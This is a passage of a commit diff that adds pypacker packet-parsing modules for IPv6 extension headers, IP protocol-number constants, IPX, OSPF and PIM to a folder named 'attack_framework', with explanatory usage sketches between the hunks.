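through the properties is safer than shifting by hand. Round-trip sketch (keyword
construction assumed to work as for the option classes below):

    from pypacker.layer3.ip6 import IP6

    pkt = IP6(hlim=64)           # v defaults to 6 via v_fc_flow = 0x60000000
    pkt.flow = 0xbeef            # 20-bit flow label
    pkt.fc = 0x2a                # 8-bit traffic class
    assert pkt.v == 6
    assert pkt.v_fc_flow == (6 << 28) | (0x2a << 20) | 0xbeef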
+
+#
+# Basic shared option classes
+#
+class IP6OptsHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),		# next extension header protocol
+		("len", "B", 0),		# option data length in 8-octet units, not counting the first 8 octets (len 0 == 64-bit header)
+		("opts", None, triggerlist.TriggerList)
+	)
+
+	def _dissect(self, buf):
+		length = 8 + buf[1] * 8
+		options = []
+		off = 2
+
+		# TODO: check https://code.google.com/p/pypacker/issues/attachmentText?id=72
+		while off < length:
+			opt_type = buf[off]
+			# logger.debug("IP6OptsHeader: type: %d" % opt_type)
+
+			# http://tools.ietf.org/html/rfc2460#section-4.2
+			# PAD1 option: no length or data field
+			if opt_type == 0:
+				opt = IP6OptionPad(type=opt_type)
+				# logger.debug("next ip6 bytes 1: %r" % (buf[off:off + 2]))
+				off += 1
+			else:
+				opt_len = buf[off + 1]
+				opt = IP6Option(type=opt_type, len=opt_len, body_bytes=buf[off + 2: off + 2 + opt_len])
+				# logger.debug("next ip6 bytes 2: %r" % (buf[off + 2: off + 2 + opt_len]))
+				off += 2 + opt_len
+			options.append(opt)
+
+		self.opts.extend(options)
+		return off
+
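The loop above is the RFC 2460 TLV rule set: PAD1 (type 0) is a lone type octet, every
other option is type/len/data. The same walk restated over a hand-made options area
(hypothetical bytes: one PAD1, then a PadN option carrying four zero bytes):

    buf = bytes([0x00,                       # PAD1: single type octet, no length/data
                 0x01, 0x04, 0, 0, 0, 0])    # PadN: type 1, len 4, four data bytes
    off, parsed = 0, []
    while off < len(buf):
        opt_type = buf[off]
        if opt_type == 0:
            parsed.append((opt_type, b""))
            off += 1
        else:
            opt_len = buf[off + 1]
            parsed.append((opt_type, buf[off + 2:off + 2 + opt_len]))
            off += 2 + opt_len
    assert parsed == [(0, b""), (1, b"\x00" * 4)]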
+
+class IP6Option(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+		("len", "B", 0)
+	)
+
+
+class IP6OptionPad(pypacker.Packet):
+	__hdr__ = (
+		("type", "B", 0),
+	)
+
+
+class IP6HopOptsHeader(IP6OptsHeader):
+	def _dissect(self, buf):
+		# logger.debug("IP6HopOptsHeader parsing")
+		return IP6OptsHeader._dissect(self, buf)
+
+
+class IP6RoutingHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),			# next extension header protocol
+		("len", "B", 0),			# extension data length in 8-octet units, not counting the first 8 octets (<= 46 for type 0)
+		("type", "B", 0),			# routing type (currently, only 0 is used)
+		("segs_left", "B", 0),			# remaining segments in route, until destination (<= 23)
+		("rsvd_sl_bits", "I", 0),		# reserved (1 byte), strict/loose bitmap for addresses
+		("addresses", None, triggerlist.TriggerList)
+	)
+
+	def __get_sl_bits(self):
+		return self.rsvd_sl_bits & 0xffffff
+
+	def __set_sl_bits(self, v):
+		self.rsvd_sl_bits = (self.rsvd_sl_bits & ~0xffffff) | (v & 0xffffff)
+	sl_bits = property(__get_sl_bits, __set_sl_bits)
+
+	def _dissect(self, buf):
+		hdr_size = 8
+		addr_size = 16
+		addresses = []
+		# extension length counts 8-octet units past the first 8 octets; each address is 2 units
+		num_addresses = buf[1] // 2
+
+		buf = buf[hdr_size:hdr_size + num_addresses * addr_size]
+
+		# logger.debug("IP6RoutingHeader: parsing addresses")
+		for i in range(num_addresses):
+			addresses.append(buf[i * addr_size: i * addr_size + addr_size])
+
+		self.addresses.extend(addresses)
+		return hdr_size + num_addresses * addr_size
+
+
+class IP6FragmentHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),			# next extension header protocol
+		("resv", "B", 0),			# reserved, set to 0
+		("frag_off_resv_m", "H", 0),		# frag offset (13 bits), reserved zero (2 bits), More frags flag
+		("id", "I", 0)				# fragments id
+	)
+
+	def __get_frag_off(self):
+		return self.frag_off_resv_m >> 3
+
+	def __set_frag_off(self, v):
+		self.frag_off_resv_m = (self.frag_off_resv_m & ~0xfff8) | ((v & 0x1fff) << 3)
+	frag_off = property(__get_frag_off, __set_frag_off)
+
+	def __get_m_flag(self):
+		return self.frag_off_resv_m & 1
+
+	def __set_m_flag(self, v):
+		self.frag_off_resv_m = (self.frag_off_resv_m & ~1) | (v & 1)
+	m_flag = property(__get_m_flag, __set_m_flag)
+
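frag_off and m_flag share one 16-bit word (offset in the top 13 bits, M flag in bit 0),
so the two properties must round-trip against frag_off_resv_m. Sketch:

    from pypacker.layer3.ip6 import IP6FragmentHeader

    fh = IP6FragmentHeader(id=0x1234)
    fh.frag_off = 185                   # offset in 8-octet units
    fh.m_flag = 1                       # more fragments follow
    assert fh.frag_off_resv_m == (185 << 3) | 1
    assert (fh.frag_off, fh.m_flag) == (185, 1)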
+
+class IP6AHHeader(pypacker.Packet):
+	__hdr__ = (
+		("nxt", "B", 0),			 # next extension header protocol
+		("len", "B", 0),			 # length of header in 4 octet units (ignoring first 2 units)
+		("resv", "H", 0),			 # reserved, 2 bytes of 0
+		("spi", "I", 0),			 # SPI security parameter index
+		("seq", "I", 0)				 # sequence no.
+	)
+
+
+class IP6ESPHeader(pypacker.Packet):
+	def _dissect(self, buf):
+		raise NotImplementedError("ESP extension headers are not supported.")
+
+
+class IP6DstOptsHeader(IP6OptsHeader):
+	def _dissect(self, buf):
+		# logger.debug("IP6DstOptsHeader parsing")
+		return IP6OptsHeader._dissect(self, buf)
+
+ext_hdrs_cls = {
+		IP_PROTO_HOPOPTS: IP6HopOptsHeader,
+		IP_PROTO_ROUTING: IP6RoutingHeader,
+		IP_PROTO_FRAGMENT: IP6FragmentHeader,
+		IP_PROTO_ESP: IP6ESPHeader,
+		IP_PROTO_AH: IP6AHHeader,
+		IP_PROTO_DSTOPTS: IP6DstOptsHeader
+		# IP_PROTO_MOBILITY:
+		# IP_PROTO_NONEXT:
+}
+
+# load handler
+from pypacker.layer3 import esp, icmp6, igmp, ipx, ospf, pim
+from pypacker.layer4 import tcp, udp, sctp
+
+pypacker.Packet.load_handler(IP6,
+	{
+		IP_PROTO_ICMP6: icmp6.ICMP6,
+		IP_PROTO_IGMP: igmp.IGMP,
+		IP_PROTO_TCP: tcp.TCP,
+		IP_PROTO_UDP: udp.UDP,
+		IP_PROTO_IP6: IP6,
+		IP_PROTO_ESP: esp.ESP,
+		IP_PROTO_PIM: pim.PIM,
+		IP_PROTO_IPXIP: ipx.IPX,
+		IP_PROTO_SCTP: sctp.SCTP,
+		IP_PROTO_OSPF: ospf.OSPF
+	}
+)
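Put together, _dissect() plus this handler table turn a raw IPv6 frame into an IP6
object whose opts list holds typed extension headers. A sketch over a hand-built buffer,
assuming the constructor dissects eagerly as the code above implies (40-byte base
header, one hop-by-hop header carrying a PadN option, then a bare 8-byte UDP header):

    from pypacker.layer3.ip6 import IP6

    base = (b"\x60\x00\x00\x00"         # version 6, tc 0, flow 0
            b"\x00\x10"                 # payload length: 8 (hop-by-hop) + 8 (UDP)
            b"\x00\x40"                 # next header 0 = hop-by-hop, hop limit 64
            + b"\x00" * 15 + b"\x01"    # src ::1
            + b"\x00" * 15 + b"\x02")   # dst ::2
    hbh = b"\x11\x00\x01\x04" + b"\x00" * 4        # nxt=17 (UDP), len=0, PadN(4)
    udp_hdr = b"\x30\x39\x00\x35\x00\x08\x00\x00"  # sport 12345, dport 53, len 8

    pkt = IP6(base + hbh + udp_hdr)
    assert len(pkt.opts) == 1           # the hop-by-hop extension header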

+ 141 - 0
attack_framework/pypacker/layer3/ip_shared.py

@@ -0,0 +1,141 @@
+"""Shared constants for IPv4 and IPv6."""
+
+# Protocol numbers - http://www.iana.org/assignments/protocol-numbers
+IP_PROTO_IP		= 0			# dummy for IP
+IP_PROTO_HOPOPTS	= IP_PROTO_IP		# IPv6 hop-by-hop options
+IP_PROTO_ICMP		= 1			# ICMP
+IP_PROTO_IGMP		= 2			# IGMP
+IP_PROTO_GGP		= 3			# gateway-gateway protocol
+IP_PROTO_IPIP		= 4			# IP in IP
+IP_PROTO_ST		= 5			# ST datagram mode
+IP_PROTO_TCP		= 6			# TCP
+IP_PROTO_CBT		= 7			# CBT
+IP_PROTO_EGP		= 8			# exterior gateway protocol
+IP_PROTO_IGP		= 9			# interior gateway protocol
+IP_PROTO_BBNRCC		= 10			# BBN RCC monitoring
+IP_PROTO_NVP		= 11			# Network Voice Protocol
+IP_PROTO_PUP		= 12			# PARC universal packet
+IP_PROTO_ARGUS		= 13			# ARGUS
+IP_PROTO_EMCON		= 14			# EMCON
+IP_PROTO_XNET		= 15			# Cross Net Debugger
+IP_PROTO_CHAOS		= 16			# Chaos
+IP_PROTO_UDP		= 17			# UDP
+IP_PROTO_MUX		= 18			# multiplexing
+IP_PROTO_DCNMEAS	= 19			# DCN measurement
+IP_PROTO_HMP		= 20			# Host Monitoring Protocol
+IP_PROTO_PRM		= 21			# Packet Radio Measurement
+IP_PROTO_IDP		= 22			# Xerox NS IDP
+IP_PROTO_TRUNK1		= 23			# Trunk-1
+IP_PROTO_TRUNK2		= 24			# Trunk-2
+IP_PROTO_LEAF1		= 25			# Leaf-1
+IP_PROTO_LEAF2		= 26			# Leaf-2
+IP_PROTO_RDP		= 27			# "Reliable Datagram" proto
+IP_PROTO_IRTP		= 28			# Inet Reliable Transaction
+IP_PROTO_TP		= 29			# ISO TP class 4
+IP_PROTO_NETBLT		= 30			# Bulk Data Transfer
+IP_PROTO_MFPNSP		= 31			# MFE Network Services
+IP_PROTO_MERITINP	= 32			# Merit Internodal Protocol
+IP_PROTO_SEP		= 33			# Sequential Exchange proto
+IP_PROTO_3PC		= 34			# Third Party Connect proto
+IP_PROTO_IDPR		= 35			# Interdomain Policy Route
+IP_PROTO_XTP		= 36			# Xpress Transfer Protocol
+IP_PROTO_DDP		= 37			# Datagram Delivery Proto
+IP_PROTO_CMTP		= 38			# IDPR Ctrl Message Trans
+IP_PROTO_TPPP		= 39			# TP++ Transport Protocol
+IP_PROTO_IL		= 40			# IL Transport Protocol
+IP_PROTO_IP6		= 41			# IPv6
+IP_PROTO_SDRP		= 42			# Source Demand Routing
+IP_PROTO_ROUTING	= 43			# IPv6 routing header
+IP_PROTO_FRAGMENT	= 44			# IPv6 fragmentation header
+IP_PROTO_RSVP		= 46			# Reservation protocol
+IP_PROTO_GRE		= 47			# General Routing Encap
+IP_PROTO_MHRP		= 48			# Mobile Host Routing
+IP_PROTO_ENA		= 49			# ENA
+IP_PROTO_ESP		= 50			# Encap Security Payload
+IP_PROTO_AH		= 51			# Authentication Header
+IP_PROTO_INLSP		= 52			# Integrated Net Layer Sec
+IP_PROTO_SWIPE		= 53			# SWIPE
+IP_PROTO_NARP		= 54			# NBMA Address Resolution
+IP_PROTO_MOBILE		= 55			# Mobile IP, RFC 2004
+IP_PROTO_TLSP		= 56			# Transport Layer Security
+IP_PROTO_SKIP		= 57			# SKIP
+IP_PROTO_ICMP6		= 58			# ICMP for IPv6
+IP_PROTO_NONE		= 59			# IPv6 no next header
+IP_PROTO_DSTOPTS	= 60			# IPv6 destination options
+IP_PROTO_ANYHOST	= 61			# any host internal proto
+IP_PROTO_CFTP		= 62			# CFTP
+IP_PROTO_ANYNET		= 63			# any local network
+IP_PROTO_EXPAK		= 64			# SATNET and Backroom EXPAK
+IP_PROTO_KRYPTOLAN	= 65			# Kryptolan
+IP_PROTO_RVD		= 66			# MIT Remote Virtual Disk
+IP_PROTO_IPPC		= 67			# Inet Pluribus Packet Core
+IP_PROTO_DISTFS		= 68			# any distributed fs
+IP_PROTO_SATMON		= 69			# SATNET Monitoring
+IP_PROTO_VISA		= 70			# VISA Protocol
+IP_PROTO_IPCV		= 71			# Inet Packet Core Utility
+IP_PROTO_CPNX		= 72			# Comp Proto Net Executive
+IP_PROTO_CPHB		= 73			# Comp Protocol Heart Beat
+IP_PROTO_WSN		= 74			# Wang Span Network
+IP_PROTO_PVP		= 75			# Packet Video Protocol
+IP_PROTO_BRSATMON	= 76			# Backroom SATNET Monitor
+IP_PROTO_SUNND		= 77			# SUN ND Protocol
+IP_PROTO_WBMON		= 78			# WIDEBAND Monitoring
+IP_PROTO_WBEXPAK	= 79			# WIDEBAND EXPAK
+IP_PROTO_EON		= 80			# ISO CNLP
+IP_PROTO_VMTP		= 81			# Versatile Msg Transport
+IP_PROTO_SVMTP		= 82			# Secure VMTP
+IP_PROTO_VINES		= 83			# VINES
+IP_PROTO_TTP		= 84			# TTP
+IP_PROTO_NSFIGP		= 85			# NSFNET-IGP
+IP_PROTO_DGP		= 86			# Dissimilar Gateway Proto
+IP_PROTO_TCF		= 87			# TCF
+IP_PROTO_EIGRP		= 88			# EIGRP
+IP_PROTO_OSPF		= 89			# Open Shortest Path First
+IP_PROTO_SPRITERPC	= 90			# Sprite RPC Protocol
+IP_PROTO_LARP		= 91			# Locus Address Resolution
+IP_PROTO_MTP		= 92			# Multicast Transport Proto
+IP_PROTO_AX25		= 93			# AX.25 Frames
+IP_PROTO_IPIPENCAP	= 94			# yet-another IP encap
+IP_PROTO_MICP		= 95			# Mobile Internet Ctrl
+IP_PROTO_SCCSP		= 96			# Semaphore Comm Sec Proto
+IP_PROTO_ETHERIP	= 97			# Ethernet in IPv4
+IP_PROTO_ENCAP		= 98			# encapsulation header
+IP_PROTO_ANYENC		= 99			# private encryption scheme
+IP_PROTO_GMTP		= 100			# GMTP
+IP_PROTO_IFMP		= 101			# Ipsilon Flow Mgmt Proto
+IP_PROTO_PNNI		= 102			# PNNI over IP
+IP_PROTO_PIM		= 103			# Protocol Indep Multicast
+IP_PROTO_ARIS		= 104			# ARIS
+IP_PROTO_SCPS		= 105			# SCPS
+IP_PROTO_QNX		= 106			# QNX
+IP_PROTO_AN		= 107			# Active Networks
+IP_PROTO_IPCOMP		= 108			# IP Payload Compression
+IP_PROTO_SNP		= 109			# Sitara Networks Protocol
+IP_PROTO_COMPAQPEER	= 110			# Compaq Peer Protocol
+IP_PROTO_IPXIP		= 111			# IPX in IP
+IP_PROTO_VRRP		= 112			# Virtual Router Redundancy
+IP_PROTO_PGM		= 113			# PGM Reliable Transport
+IP_PROTO_ANY0HOP	= 114			# 0-hop protocol
+IP_PROTO_L2TP		= 115			# Layer 2 Tunneling Proto
+IP_PROTO_DDX		= 116			# D-II Data Exchange (DDX)
+IP_PROTO_IATP		= 117			# Interactive Agent Xfer
+IP_PROTO_STP		= 118			# Schedule Transfer Proto
+IP_PROTO_SRP		= 119			# SpectraLink Radio Proto
+IP_PROTO_UTI		= 120			# UTI
+IP_PROTO_SMP		= 121			# Simple Message Protocol
+IP_PROTO_SM		= 122			# SM
+IP_PROTO_PTP		= 123			# Performance Transparency
+IP_PROTO_ISIS		= 124			# ISIS over IPv4
+IP_PROTO_FIRE		= 125			# FIRE
+IP_PROTO_CRTP		= 126			# Combat Radio Transport
+IP_PROTO_CRUDP		= 127			# Combat Radio UDP
+IP_PROTO_SSCOPMCE	= 128			# SSCOPMCE
+IP_PROTO_IPLT		= 129			# IPLT
+IP_PROTO_SPS		= 130			# Secure Packet Shield
+IP_PROTO_PIPE		= 131			# Private IP Encap in IP
+IP_PROTO_SCTP		= 132			# Stream Ctrl Transmission
+IP_PROTO_FC		= 133			# Fibre Channel
+IP_PROTO_RSVPIGN	= 134			# RSVP-E2E-IGNORE
+IP_PROTO_RAW		= 255			# Raw IP packets
+IP_PROTO_RESERVED	= IP_PROTO_RAW		# Reserved
+IP_PROTO_MAX		= 255
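Because every assignment follows the IP_PROTO_<NAME> pattern, a number-to-name table for
logging can be derived from this module instead of being maintained by hand. Sketch
(module path as laid out in this commit):

    from pypacker.layer3 import ip_shared

    PROTO_NAMES = {}
    for name in dir(ip_shared):
        if name.startswith("IP_PROTO_"):
            # aliases (e.g. IP_PROTO_RESERVED == IP_PROTO_RAW) keep the first name seen
            PROTO_NAMES.setdefault(getattr(ip_shared, name), name)

    assert PROTO_NAMES[6] == "IP_PROTO_TCP"
    assert PROTO_NAMES[132] == "IP_PROTO_SCTP"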

+ 16 - 0
attack_framework/pypacker/layer3/ipx.py

@@ -0,0 +1,16 @@
+"""Internetwork Packet Exchange."""
+
+from pypacker import pypacker
+
+IPX_HDR_LEN = 30
+
+
+class IPX(pypacker.Packet):
+	__hdr__ = (
+		("sum", "H", 0xffff),
+		("len", "H", IPX_HDR_LEN),
+		("tc", "B", 0),
+		("pt", "B", 0),
+		("dst", "12s", b""),
+		("src", "12s", b"")
+	)
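IPX is header-only here, but the fixed-width fields already give a usable 30-byte
encoder. Sketch (dst/src are raw 12-byte network.node.socket addresses; packet type 4
would be PEP):

    from pypacker.layer3.ipx import IPX, IPX_HDR_LEN

    ipx_pkt = IPX(dst=b"\x00" * 12, src=b"\x00" * 12, pt=4)
    assert len(ipx_pkt.bin()) == IPX_HDR_LEN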

+ 26 - 0
attack_framework/pypacker/layer3/ospf.py

@@ -0,0 +1,26 @@
+"""Open Shortest Path First."""
+
+from pypacker import pypacker, checksum
+
+AUTH_NONE = 0
+AUTH_PASSWORD = 1
+AUTH_CRYPTO = 2
+
+
+class OSPF(pypacker.Packet):
+	__hdr__ = (
+		("v", "B", 0),
+		("type", "B", 0),
+		("len", "H", 0),
+		("router", "I", 0),
+		("area", "I", 0),
+		("sum", "H", 0),		# _sum = sum
+		("atype", "H", 0),
+		("auth", "8s", b"")
+	)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields and self._changed():
+			self.sum = 0
+			self.sum = checksum.in_cksum(pypacker.Packet.bin(self))
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
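The bin() override is the recompute-on-change pattern used throughout layer3: zero the
checksum, sum the serialized packet, then serialize with the final value. Usage sketch,
assuming keyword construction marks the packet as changed like elsewhere in pypacker:

    from pypacker.layer3.ospf import OSPF

    ospf_pkt = OSPF(v=2, type=1, router=0x0a000001)   # type 1 = hello
    raw = ospf_pkt.bin()           # sum recomputed on first serialization
    assert ospf_pkt.bin() == raw   # unchanged packet keeps its checksum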

+ 31 - 0
attack_framework/pypacker/layer3/pim.py

@@ -0,0 +1,31 @@
+"""Protocol Independent Multicast."""
+
+from pypacker import pypacker, checksum
+
+
+class PIM(pypacker.Packet):
+	__hdr__ = (
+		("v_type", "B", 0x20),
+		("rsvd", "B", 0),
+		("sum", "H", 0)		# _sum = sum
+	)
+
+	def __get_v(self):
+		return self.v_type >> 4
+
+	def __set_v(self, v):
+		self.v_type = (v << 4) | (self.v_type & 0xf)
+	v = property(__get_v, __set_v)
+
+	def __get_type(self):
+		return self.v_type & 0xf
+
+	def __set_type(self, pimtype):
+		self.v_type = (self.v_type & 0xf0) | pimtype
+	type = property(__get_type, __set_type)
+
+	def bin(self, update_auto_fields=True):
+		if update_auto_fields and self._changed():
+			self.sum = 0
+			self.sum = checksum.in_cksum(pypacker.Packet.bin(self))
+		return pypacker.Packet.bin(self, update_auto_fields=update_auto_fields)
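Same nibble packing as IP6's version field: v sits in the high nibble of v_type, type in
the low one. Sketch:

    from pypacker.layer3.pim import PIM

    pim_pkt = PIM()          # default v_type 0x20: PIM version 2, type 0 (hello)
    assert pim_pkt.v == 2
    pim_pkt.type = 3         # 3 = join/prune
    assert pim_pkt.v_type == 0x23
    raw = pim_pkt.bin()      # checksum refreshed because the header changed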

+ 0 - 0
attack_framework/pypacker/layer4/__init__.py


BIN
attack_framework/pypacker/layer4/__pycache__/__init__.cpython-33.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/__init__.cpython-34.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/sctp.cpython-33.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/sctp.cpython-34.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/ssl.cpython-33.pyc


BIN
attack_framework/pypacker/layer4/__pycache__/ssl.cpython-34.pyc


Some files were not shown because too many files changed in this diff